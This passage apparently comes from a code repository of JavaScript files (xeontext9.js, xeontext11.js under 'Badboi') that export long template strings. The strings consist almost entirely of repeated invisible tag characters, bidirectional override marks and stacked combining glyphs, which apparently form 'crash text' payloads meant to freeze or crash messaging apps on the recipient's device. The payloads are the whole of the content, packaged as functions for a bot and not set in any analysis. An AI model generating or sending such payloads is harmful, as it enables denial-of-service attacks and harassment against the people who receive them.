󠀬󠀭󠀳󠀳󠀳󠀵󠀵󠀵󠀵‫‪‫҈꙲ 󠀬󠀭󠀳󠀳󠀳󠀵󠀵󠀵󠀵‫‪‫҈꙲ 󠀬󠀭󠀳󠀳󠀳󠀵󠀵󠀵󠀵‫‪‫҈꙲ 󠀬󠀭󠀳󠀳󠀳󠀵󠀵󠀵󠀵‫‪‫҈꙲ 󠀬󠀭󠀳󠀳󠀳󠀵󠀵󠀵󠀵‫‪‫҈꙲ 󠀬󠀭󠀳󠀳󠀳󠀵󠀵󠀵󠀵‫‪‫҈꙲ 󠀬󠀭󠀳󠀳󠀳󠀵󠀵󠀵󠀵‫‪‫҈꙲ 󠀬󠀭󠀳󠀳󠀳󠀵󠀵󠀵󠀵‫‪‫҈꙲ 󠀬󠀭󠀳󠀳󠀳󠀵󠀵󠀵󠀵‫‪‫҈꙲ 󠀬󠀭󠀳󠀳󠀳󠀵󠀵󠀵󠀵‫‪‫҈꙲ 󠀬󠀭󠀳󠀳󠀳󠀵󠀵󠀵󠀵‫‪‫҈꙲ 󠀬󠀭󠀳󠀳󠀳󠀵󠀵󠀵󠀵‫‪‫҈꙲ 󠀬󠀭󠀳󠀳󠀳󠀵󠀵󠀵󠀵‫‪‫҈꙲ 󠀬󠀭󠀳󠀳󠀳󠀵󠀵󠀵󠀵‫‪‫҈꙲ 󠀬󠀭󠀳󠀳󠀳󠀵󠀵󠀵󠀵‫‪‫҈꙲ 󠀬󠀭󠀳󠀳󠀳󠀵󠀵󠀵󠀵‫‪‫҈꙲ 󠀬󠀭󠀳󠀳󠀳󠀵󠀵󠀵󠀵‫‪‫҈꙲ 󠀬󠀭󠀳󠀳󠀳󠀵󠀵󠀵󠀵‫‪‫҈꙲ 󠀬󠀭󠀳󠀳󠀳󠀵󠀵󠀵󠀵‫‪‫҈꙲ 󠀬󠀭󠀳󠀳󠀳󠀵󠀵󠀵󠀵‫‪‫҈꙲ 󠀬󠀭󠀳󠀳󠀳󠀵󠀵󠀵󠀵‫‪‫҈꙲ 󠀬󠀭󠀳󠀳󠀳󠀵󠀵󠀵󠀵‫‪‫҈꙲ 󠀬󠀭󠀳󠀳󠀳󠀵󠀵󠀵󠀵‫‪‫҈꙲ 󠀬󠀭󠀳󠀳󠀳󠀵󠀵󠀵󠀵‫‪‫҈꙲ 󠀬󠀭󠀳󠀳󠀳󠀵󠀵󠀵󠀵‫‪‫҈꙲ 󠀬󠀭󠀳󠀳󠀳󠀵󠀵󠀵󠀵‫‪‫҈꙲ 󠀬󠀭󠀳󠀳󠀳󠀵󠀵󠀵󠀵‫‪‫҈꙲ 󠀬󠀭󠀳󠀳󠀳󠀵󠀵󠀵󠀵‫‪‫҈꙲ 󠀬󠀭󠀳󠀳󠀳󠀵󠀵󠀵󠀵‫‪‫҈꙲ 󠀬󠀭󠀳󠀳󠀳󠀵󠀵󠀵󠀵‫‪‫҈꙲ 󠀬󠀭󠀳󠀳󠀳󠀵󠀵󠀵󠀵‫‪‫҈꙲ 󠀬󠀭󠀳󠀳󠀳󠀵󠀵󠀵󠀵‫‪‫҈꙲ 󠀬󠀭󠀳󠀳󠀳󠀵󠀵󠀵󠀵‫‪‫҈꙲ 󠀬󠀭󠀳󠀳󠀳󠀵󠀵󠀵󠀵‫‪‫҈꙲ 󠀬󠀭󠀳󠀳󠀳󠀵󠀵󠀵󠀵‫‪‫҈꙲ 󠀬󠀭󠀳󠀳󠀳󠀵󠀵󠀵󠀵‫‪‫҈꙲ 󠀬󠀭󠀳󠀳󠀳󠀵󠀵󠀵󠀵‫‪‫҈꙲ 󠀬󠀭󠀳󠀳󠀳󠀵󠀵󠀵󠀵‫‪‫҈꙲ 󠀬󠀭󠀳󠀳󠀳󠀵󠀵󠀵󠀵‫‪‫҈꙲ 󠀬󠀭󠀳󠀳󠀳󠀵󠀵󠀵󠀵‫‪‫҈꙲ 󠀬󠀭󠀳󠀳󠀳󠀵󠀵󠀵󠀵‫‪‫҈꙲ 󠀬󠀭󠀳󠀳󠀳󠀵󠀵󠀵󠀵‫‪‫҈꙲ 󠀬󠀭󠀳󠀳󠀳󠀵󠀵󠀵󠀵‫‪‫҈꙲ 󠀬󠀭󠀳󠀳󠀳󠀵󠀵󠀵󠀵‫‪‫҈꙲ 󠀬󠀭󠀳󠀳󠀳󠀵󠀵󠀵󠀵‫‪‫҈꙲ 󠀬󠀭󠀳󠀳󠀳󠀵󠀵󠀵󠀵‫‪‫҈꙲ 󠀬󠀭󠀳󠀳󠀳󠀵󠀵󠀵󠀵‫‪‫҈꙲ 󠀬󠀭󠀳󠀳󠀳󠀵󠀵󠀵󠀵‫‪‫҈꙲ 󠀬󠀭󠀳󠀳󠀳󠀵󠀵󠀵󠀵‫‪‫҈꙲ 󠀬󠀭󠀳󠀳󠀳󠀵󠀵󠀵󠀵‫‪‫҈꙲ 󠀬󠀭󠀳󠀳󠀳󠀵󠀵󠀵󠀵‫‪‫҈꙲ 󠀬󠀭󠀳󠀳󠀳󠀵󠀵󠀵󠀵‫‪‫҈꙲ 󠀬󠀭󠀳󠀳󠀳󠀵󠀵󠀵󠀵‫‪‫҈꙲ 󠀬󠀭󠀳󠀳󠀳󠀵󠀵󠀵󠀵‫‪‫҈꙲ 󠀬󠀭󠀳󠀳󠀳󠀵󠀵󠀵󠀵‫‪‫҈꙲ 󠀬󠀭󠀳󠀳󠀳󠀵󠀵󠀵󠀵‫‪‫҈꙲ 󠀬󠀭󠀳󠀳󠀳󠀵󠀵󠀵󠀵‫‪‫҈꙲ 󠀬󠀭󠀳󠀳󠀳󠀵󠀵󠀵󠀵‫‪‫҈꙲ 󠀬󠀭󠀳󠀳󠀳󠀵󠀵󠀵󠀵‫‪‫҈꙲ 󠀬󠀭󠀳󠀳󠀳󠀵󠀵󠀵󠀵‫‪‫҈꙲ 󠀬󠀭󠀳󠀳󠀳󠀵󠀵󠀵󠀵‫‪‫҈꙲ 󠀬󠀭󠀳󠀳󠀳󠀵󠀵󠀵󠀵‫‪‫҈꙲ 󠀬󠀭󠀳󠀳󠀳󠀵󠀵󠀵󠀵‫‪‫҈꙲ 󠀬󠀭󠀳󠀳󠀳󠀵󠀵󠀵󠀵‫‪‫҈꙲ 󠀬󠀭󠀳󠀳󠀳󠀵󠀵󠀵󠀵‫‪‫҈꙲ 󠀬󠀭󠀳󠀳󠀳󠀵󠀵󠀵󠀵‫‪‫҈꙲ 󠀬󠀭󠀳󠀳󠀳󠀵󠀵󠀵󠀵‫‪‫҈꙲ 󠀬󠀭󠀳󠀳󠀳󠀵󠀵󠀵󠀵‫‪‫҈꙲ 󠀬󠀭󠀳󠀳󠀳󠀵󠀵󠀵󠀵‫‪‫҈꙲ 󠀬󠀭󠀳󠀳󠀳󠀵󠀵󠀵󠀵‫‪‫҈꙲ 󠀬󠀭󠀳󠀳󠀳󠀵󠀵󠀵󠀵‫‪‫҈꙲ 󠀬󠀭󠀳󠀳󠀳󠀵󠀵󠀵󠀵‫‪‫҈꙲ 󠀬󠀭󠀳󠀳󠀳󠀵󠀵󠀵󠀵‫‪‫҈꙲ 󠀬󠀭󠀳󠀳󠀳󠀵󠀵󠀵󠀵‫‪‫҈꙲ 󠀬󠀭󠀳󠀳󠀳󠀵󠀵󠀵󠀵‫‪‫҈꙲ 󠀬󠀭󠀳󠀳󠀳󠀵󠀵󠀵󠀵‫‪‫҈꙲ 󠀬󠀭󠀳󠀳󠀳󠀵󠀵󠀵󠀵‫‪‫҈꙲ 󠀬󠀭󠀳󠀳󠀳󠀵󠀵󠀵󠀵‫‪‫҈꙲ 󠀬󠀭󠀳󠀳󠀳󠀵󠀵󠀵󠀵‫‪‫҈꙲ 󠀬󠀭󠀳󠀳󠀳󠀵󠀵󠀵󠀵‫‪‫҈꙲ 󠀬󠀭󠀳󠀳󠀳󠀵󠀵󠀵󠀵‫‪‫҈꙲ 󠀬󠀭󠀳󠀳󠀳󠀵󠀵󠀵󠀵‫‪‫҈꙲ 󠀬󠀭󠀳󠀳󠀳󠀵󠀵󠀵󠀵‫‪‫҈꙲ 󠀬󠀭󠀳󠀳󠀳󠀵󠀵󠀵󠀵‫‪‫҈꙲ 󠀬󠀭󠀳󠀳󠀳󠀵󠀵󠀵󠀵‫‪‫҈꙲ 󠀬󠀭󠀳󠀳󠀳󠀵󠀵󠀵󠀵‫‪‫҈꙲ 󠀬󠀭󠀳󠀳󠀳󠀵󠀵󠀵󠀵‫‪‫҈꙲ 󠀬󠀭󠀳󠀳󠀳󠀵󠀵󠀵󠀵‫‪‫҈꙲ 󠀬󠀭󠀳󠀳󠀳󠀵󠀵󠀵󠀵‫‪‫҈꙲ 󠀬󠀭󠀳󠀳󠀳󠀵󠀵󠀵󠀵‫‪‫҈꙲ 󠀬󠀭󠀳󠀳󠀳󠀵󠀵󠀵󠀵‫‪‫҈꙲ 󠀬󠀭󠀳󠀳󠀳󠀵󠀵󠀵󠀵‫‪‫҈꙲ 󠀬󠀭󠀳󠀳󠀳󠀵󠀵󠀵󠀵‫‪‫҈꙲ 󠀬󠀭󠀳󠀳󠀳󠀵󠀵󠀵󠀵‫‪‫҈꙲ 󠀬󠀭󠀳󠀳󠀳󠀵󠀵󠀵󠀵‫‪‫҈꙲ 󠀬󠀭󠀳󠀳󠀳󠀵󠀵󠀵󠀵‫‪‫҈꙲ 󠀬󠀭󠀳󠀳󠀳󠀵󠀵󠀵󠀵‫‪‫҈꙲ 󠀬󠀭󠀳󠀳󠀳󠀵󠀵󠀵󠀵‫‪‫҈꙲ 󠀬󠀭󠀳󠀳󠀳󠀵󠀵󠀵󠀵‫‪‫҈꙲ 󠀬󠀭󠀳󠀳󠀳󠀵󠀵󠀵󠀵‫‪‫҈꙲ 󠀬󠀭󠀳󠀳󠀳󠀵󠀵󠀵󠀵‫‪‫҈꙲ 󠀬󠀭󠀳󠀳󠀳󠀵󠀵󠀵󠀵‫‪‫҈꙲ 󠀬󠀭󠀳󠀳󠀳󠀵󠀵󠀵󠀵‫‪‫҈꙲ 󠀬󠀭󠀳󠀳󠀳󠀵󠀵󠀵󠀵‫‪‫҈꙲ 󠀬󠀭󠀳󠀳󠀳󠀵󠀵󠀵󠀵‫‪‫҈꙲ 󠀬󠀭󠀳󠀳󠀳󠀵󠀵󠀵󠀵‫‪‫҈꙲ 󠀬󠀭󠀳󠀳󠀳󠀵󠀵󠀵󠀵‫‪‫҈꙲ 󠀬󠀭󠀳󠀳󠀳󠀵󠀵󠀵󠀵‫‪‫҈꙲ 󠀬󠀭󠀳󠀳󠀳󠀵󠀵󠀵󠀵‫‪‫҈꙲ 󠀬󠀭󠀳󠀳󠀳󠀵󠀵󠀵󠀵‫‪‫҈꙲ 󠀬󠀭󠀳󠀳󠀳󠀵󠀵󠀵󠀵‫‪‫҈꙲ 󠀬󠀭󠀳󠀳󠀳󠀵󠀵󠀵󠀵‫‪‫҈꙲ 󠀬󠀭󠀳󠀳󠀳󠀵󠀵󠀵󠀵‫‪‫҈꙲ 󠀬󠀭󠀳󠀳󠀳󠀵󠀵󠀵󠀵‫‪‫҈꙲ 󠀬󠀭󠀳󠀳󠀳󠀵󠀵󠀵󠀵‫‪‫҈꙲ 󠀬󠀭󠀳󠀳󠀳󠀵󠀵󠀵󠀵‫‪‫҈꙲ 󠀬󠀭󠀳󠀳󠀳󠀵󠀵󠀵󠀵‫‪‫҈꙲ 󠀬󠀭󠀳󠀳󠀳󠀵󠀵󠀵󠀵‫‪‫҈꙲ 󠀬󠀭󠀳󠀳󠀳󠀵󠀵󠀵󠀵‫‪‫҈꙲ 󠀬󠀭󠀳󠀳󠀳󠀵󠀵󠀵󠀵‫‪‫҈꙲ 󠀬󠀭󠀳󠀳󠀳󠀵󠀵󠀵󠀵‫‪‫҈꙲ 󠀬󠀭󠀳󠀳󠀳󠀵󠀵󠀵󠀵‫‪‫҈꙲ 󠀬󠀭󠀳󠀳󠀳󠀵󠀵󠀵󠀵‫‪‫҈꙲ 󠀬󠀭󠀳󠀳󠀳󠀵󠀵󠀵󠀵‫‪‫҈꙲ 󠀬󠀭󠀳󠀳󠀳󠀵󠀵󠀵󠀵‫‪‫҈꙲ 󠀬󠀭󠀳󠀳󠀳󠀵󠀵󠀵󠀵‫‪‫҈꙲ 󠀬󠀭󠀳󠀳󠀳󠀵󠀵󠀵󠀵‫‪‫҈꙲ 󠀬󠀭󠀳󠀳󠀳󠀵󠀵󠀵󠀵‫‪‫҈꙲ 󠀬󠀭󠀳󠀳󠀳󠀵󠀵󠀵󠀵‫‪‫҈꙲ 󠀬󠀭󠀳󠀳󠀳󠀵󠀵󠀵󠀵‫‪‫҈꙲ 󠀬󠀭󠀳󠀳󠀳󠀵󠀵󠀵󠀵‫‪‫҈꙲ 󠀬󠀭󠀳󠀳󠀳󠀵󠀵󠀵󠀵‫‪‫҈꙲ 󠀬󠀭󠀳󠀳󠀳󠀵󠀵󠀵󠀵‫‪‫҈꙲ 󠀬󠀭󠀳󠀳󠀳󠀵󠀵󠀵󠀵‫‪‫҈꙲ 󠀬󠀭󠀳󠀳󠀳󠀵󠀵󠀵󠀵‫‪‫҈꙲ 󠀬󠀭󠀳󠀳󠀳󠀵󠀵󠀵󠀵‫‪‫҈꙲ 󠀬󠀭󠀳󠀳󠀳󠀵󠀵󠀵󠀵‫‪‫҈꙲ 󠀬󠀭󠀳󠀳󠀳󠀵󠀵󠀵󠀵‫‪‫҈꙲ 󠀬󠀭󠀳󠀳󠀳󠀵󠀵󠀵󠀵‫‪‫҈꙲ 󠀬󠀭󠀳󠀳󠀳󠀵󠀵󠀵󠀵‫‪‫҈꙲ 󠀬󠀭󠀳󠀳󠀳󠀵󠀵󠀵󠀵‫‪‫҈꙲ 󠀬󠀭󠀳󠀳󠀳󠀵󠀵󠀵󠀵‫‪‫҈꙲ 󠀬󠀭󠀳󠀳󠀳󠀵󠀵󠀵󠀵‫‪‫҈꙲ 󠀬󠀭󠀳󠀳󠀳󠀵󠀵󠀵󠀵‫‪‫҈꙲ 󠀬󠀭󠀳󠀳󠀳󠀵󠀵󠀵󠀵‫‪‫҈꙲ 󠀬󠀭󠀳󠀳󠀳󠀵󠀵󠀵󠀵‫‪‫҈꙲ 󠀬󠀭󠀳󠀳󠀳󠀵󠀵󠀵󠀵‫‪‫҈꙲ 󠀬󠀭󠀳󠀳󠀳󠀵󠀵󠀵󠀵‫‪‫҈꙲ 󠀬󠀭󠀳󠀳󠀳󠀵󠀵󠀵󠀵‫‪‫҈꙲ 󠀬󠀭󠀳󠀳󠀳󠀵󠀵󠀵󠀵‫‪‫҈꙲ 󠀬󠀭󠀳󠀳󠀳󠀵󠀵󠀵󠀵‫‪‫҈꙲ 󠀬󠀭󠀳󠀳󠀳󠀵󠀵󠀵󠀵‫‪‫҈꙲ 󠀬󠀭󠀳󠀳󠀳󠀵󠀵󠀵󠀵‫‪‫҈꙲ 󠀬󠀭󠀳󠀳󠀳󠀵󠀵󠀵󠀵‫‪‫҈꙲ 󠀬󠀭󠀳󠀳󠀳󠀵󠀵󠀵󠀵‫‪‫҈꙲ 󠀬󠀭󠀳󠀳󠀳󠀵󠀵󠀵󠀵‫‪‫҈꙲ 󠀬󠀭󠀳󠀳󠀳󠀵󠀵󠀵󠀵‫‪‫҈꙲ 󠀬󠀭󠀳󠀳󠀳󠀵󠀵󠀵󠀵‫‪‫҈꙲ 󠀬󠀭󠀳󠀳󠀳󠀵󠀵󠀵󠀵‫‪‫҈꙲ 󠀬󠀭󠀳󠀳󠀳󠀵󠀵󠀵󠀵‫‪‫҈꙲ 󠀬󠀭󠀳󠀳󠀳󠀵󠀵󠀵󠀵‫‪‫҈꙲ 󠀬󠀭󠀳󠀳󠀳󠀵󠀵󠀵󠀵‫‪‫҈꙲ 󠀬󠀭󠀳󠀳󠀳󠀵󠀵󠀵󠀵‫‪‫҈꙲ 󠀬󠀭󠀳󠀳󠀳󠀵󠀵󠀵󠀵‫‪‫҈꙲ 󠀬󠀭󠀳󠀳󠀳󠀵󠀵󠀵󠀵‫‪‫҈꙲ 󠀬󠀭󠀳󠀳󠀳󠀵󠀵󠀵󠀵‫‪‫҈꙲ 󠀬󠀭󠀳󠀳󠀳󠀵󠀵󠀵󠀵‫‪‫҈꙲ 󠀬󠀭󠀳󠀳󠀳󠀵󠀵󠀵󠀵‫‪‫҈꙲ 󠀬󠀭󠀳󠀳󠀳󠀵󠀵󠀵󠀵‫‪‫҈꙲ 󠀬󠀭󠀳󠀳󠀳󠀵󠀵󠀵󠀵‫‪‫҈꙲ 󠀬󠀭󠀳󠀳󠀳󠀵󠀵󠀵󠀵‫‪‫҈꙲ 󠀬󠀭󠀳󠀳󠀳󠀵󠀵󠀵󠀵‫‪‫҈꙲ 󠀬󠀭󠀳󠀳󠀳󠀵󠀵󠀵󠀵‫‪‫҈꙲ 󠀬󠀭󠀳󠀳󠀳󠀵󠀵󠀵󠀵‫‪‫҈꙲ 󠀬󠀭󠀳󠀳󠀳󠀵󠀵󠀵󠀵‫‪‫҈꙲ 󠀬󠀭󠀳󠀳󠀳󠀵󠀵󠀵󠀵‫‪‫҈꙲ 󠀬󠀭󠀳󠀳󠀳󠀵󠀵󠀵󠀵‫‪‫҈꙲ 󠀬󠀭󠀳󠀳󠀳󠀵󠀵󠀵󠀵‫‪‫҈꙲ 󠀬󠀭󠀳󠀳󠀳󠀵󠀵󠀵󠀵‫‪‫҈꙲ 󠀬󠀭󠀳󠀳󠀳󠀵󠀵󠀵󠀵‫‪‫҈꙲ 󠀬󠀭󠀳󠀳󠀳󠀵󠀵󠀵󠀵‫‪‫҈꙲ 󠀬󠀭󠀳󠀳󠀳󠀵󠀵󠀵󠀵‫‪‫҈꙲ 󠀬󠀭󠀳󠀳󠀳󠀵󠀵󠀵󠀵‫‪‫҈꙲ 󠀬󠀭󠀳󠀳󠀳󠀵󠀵󠀵󠀵‫‪‫҈꙲ 󠀬󠀭󠀳󠀳󠀳󠀵󠀵󠀵󠀵‫‪‫҈꙲ 󠀬󠀭󠀳󠀳󠀳󠀵󠀵󠀵󠀵‫‪‫҈꙲ 󠀬󠀭󠀳󠀳󠀳󠀵󠀵󠀵󠀵‫‪‫҈꙲ 󠀬󠀭?` 2 | exports.xeontext11 = xeontext11 -------------------------------------------------------------------------------- /Badboi/xeontext9.js: -------------------------------------------------------------------------------- 1 | const xeontext9 = (prefix) => { 2 | return` ꪶ𖣂ꫂ ʏᴜᴢᴢᴜ ᴋᴀᴍɪʏᴀᴋᴀ 〽️ ꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈ